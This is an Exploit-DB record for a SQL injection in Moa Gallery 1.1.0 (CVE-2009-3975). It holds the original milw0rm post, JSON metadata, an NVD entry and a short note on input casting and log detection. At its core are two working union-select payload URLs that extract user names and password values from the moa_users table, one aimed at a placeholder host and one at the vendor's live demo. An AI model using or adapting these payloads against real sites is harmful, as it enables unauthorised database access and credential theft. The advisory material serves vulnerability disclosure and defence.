ID EDB-ID:9481
Type exploitdb
Reporter Mr.tro0oqy
Modified 2009-08-24T00:00:00
Description
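Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability (CVE-2009-3975, CWE-89). Webapps exploit for the PHP platform. Per the NVD record included below, the flaw is in index.php: the gallery_id parameter of the gallery_view action is passed into a SQL query, and both 1.1.0 and 1.2.0 are listed as affected. For defenders: gallery_id should be accepted only as an integer (cast it or reject non-numeric input) and bound through a prepared statement. Requests to index.php whose gallery_id contains SQL keywords such as "union select" are a usable detection signal in web-server logs.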
======================================================================
[»] Script : Moa gallery 1.1.0 (gallery_id) Remote Sql injection vuln
[»] Language : php
[»] Download : http://sourceforge.net/projects/moagallery/
[»] Script site : http://www.moagallery.net/
[»] Founder: Mr.tro0oqy <- from Yemen
[»] Gr44tz to: [H]-> borken heart :(
[»] E-mail : t.4@windowslive.com
======================================================================
exploit:
--------
http://www.xxx.com/path/index.php?action=gallery_view&gallery_id=-0000000009+union+select+concat(name,char(58),password)+from+moa_users--
--------
demo:
--------
http://www.moagallery.net/demo/index.php?action=gallery_view&gallery_id=-0000000609+union+select+concat%28name,char%2858%29,password%29+from+moa_users--
# milw0rm.com [2009-08-24]
{"id": "EDB-ID:9481", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Moa Gallery 1.1.0 gallery_id Remote SQL Injection Vulnerability", "description": "Moa Gallery 1.1.0 (gallery_id) Remote SQL Injection Vulnerability. CVE-2009-3975. Webapps exploit for php platform", "published": "2009-08-24T00:00:00", "modified": "2009-08-24T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/9481/", "reporter": "Mr.tro0oqy", "references": [], "cvelist": ["CVE-2009-3975"], "lastseen": "2016-02-01T10:40:50", "viewCount": 7, "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2016-02-01T10:40:50", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3975"]}], "modified": "2016-02-01T10:40:50", "rev": 2}, "vulnersScore": 7.7}, "sourceHref": "https://www.exploit-db.com/download/9481/", "sourceData": "======================================================================\n[\u00c2\u00bb] Script : Moa gallery 1.1.0 (gallery_id) Remote Sql injection vuln\n\n[\u00c2\u00bb] Language : php \n\n[\u00c2\u00bb] Download : http://sourceforge.net/projects/moagallery/\n\n[\u00c2\u00bb] Script site : http://www.moagallery.net/\n\n[\u00c2\u00bb] Founder: Mr.tro0oqy <- from Yemen\n\n[\u00c2\u00bb] Gr44tz to: [H]-> borken heart :(\n\n[\u00c2\u00bb] E-mail : t.4@windowslive.com\n======================================================================\nexploit:\n--------\n\nhttp://www.xxx.com/path/index.php?action=gallery_view&gallery_id=-0000000009+union+select+concat(name,char(58),password)+from+moa_users--\n\n--------\ndemo:\n--------\n\nhttp://www.moagallery.net/demo/index.php?action=gallery_view&gallery_id=-0000000609+union+select+concat%28name,char%2858%29,password%29+from+moa_users--\n\n# milw0rm.com [2009-08-24]\n", "osvdbidlist": ["57344"]}
{"cve": [{"lastseen": "2020-10-03T11:54:19", "description": "SQL injection vulnerability in index.php in Moa Gallery 1.1.0 and 1.2.0 allows remote attackers to execute arbitrary SQL commands via the gallery_id parameter in a gallery_view action.", "edition": 3, "cvss3": {}, "published": "2009-11-18T23:30:00", "title": "CVE-2009-3975", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3975"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:moagallery:moa:1.2.0", "cpe:/a:moagallery:moa:1.1.0"], "id": "CVE-2009-3975", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3975", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:moagallery:moa:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:moagallery:moa:1.1.0:*:*:*:*:*:*:*"]}]}